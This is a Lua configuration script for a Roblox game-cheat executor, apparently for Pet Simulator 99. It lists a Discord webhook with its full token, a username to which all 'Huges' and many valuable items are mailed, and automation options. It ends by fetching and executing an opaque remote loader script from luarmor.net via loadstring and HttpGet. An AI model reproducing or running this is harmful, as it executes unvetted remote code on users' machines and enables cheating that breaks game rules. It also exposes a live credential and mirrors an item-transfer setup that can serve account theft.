getgenv().Configuration = {
    ["Webhook"] = {
        ["UserID"] = "993062998652493824",
        ["WebhookURL"] = "https://discord.com/api/webhooks/1394039615949639822/ru1nhLaHQ0YheuaUN238iKf337NATfBXg224aTMSInFTWhNg24i7aPpFSIy6NAUAfr3r",
    },

['Mail'] = {
    ['Usernames'] = {"NguyenVanThuan47"},
    ['Mail All Huges'] = true,
    ['Items'] = {
        ['Gift'] = {
            "Rainbow Mini Chest",
            "Large Gift Bag",
            "Diamond Gift Bag",
            "Gift Bag",
            "Blossom Gift",
            "Santa Gift",
            "Cosmic Basketball Gift",
            "Snowflake Gift",
            "Candycane Gift",
            "Basketball Gift",
            "Mini Chest",
            "Time Trial Gift #2",
            "Hype Egg #2",
            "Charm Stone"
        },

        ['Egg'] = {
            "Exclusive Origami Egg",
            "Exclusive Special Ops Egg"
        },

        ['Flag'] = {
            "Exotic Treasure Flag"
        },

        ['Key'] = {
            "Tech Key",
            "Void Key",
            "Secret Key",
            "Fantasy Key",
            "MVP Key",
            "MVP Key Lower Half",
            "MVP Key Upper Half"
        },

        ['Voucher'] = {
            "Exclusive Raffle Ticket"
        },

        ['Farming'] = {
            "Diamond Plant Seed",
            "Insta-Plant Capsule"
        },

        ['Charm'] = {
            "Overload Charm"
        }
    },
},

    ["Dice On Bonus Only"] = true,  -- true = only on bonus roll  |  false = always keep buff active
    ["Craft Dice"]         = "Mega Lucky Dice II V2",
    ["Use Dice"]           = true,  -- Auto-use dice listed in Craft Dice
    ['Upgrades']           = true,
    ['Sell Pets'] = { -- Ids of pets to sell
        ["Sand Turtle"] = true,
        ["Sprout Stag"] = true,
    }, 
    ['Potions']           = {},
    ['Enchants']          = {},
    ['Fruits']            = {},

    -- Optional (Will use Defaults if not)
    --['ROLL_DELAY']        = nil,   -- Default computed value
    --['DAYCARE']           = true, -- Default true
    --['BREAK_CHEST']       = true, -- Default true
    --["RNG_EGG_KEY"]       = "First",
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/8e09351860576c626242d87609b01594.lua"))()
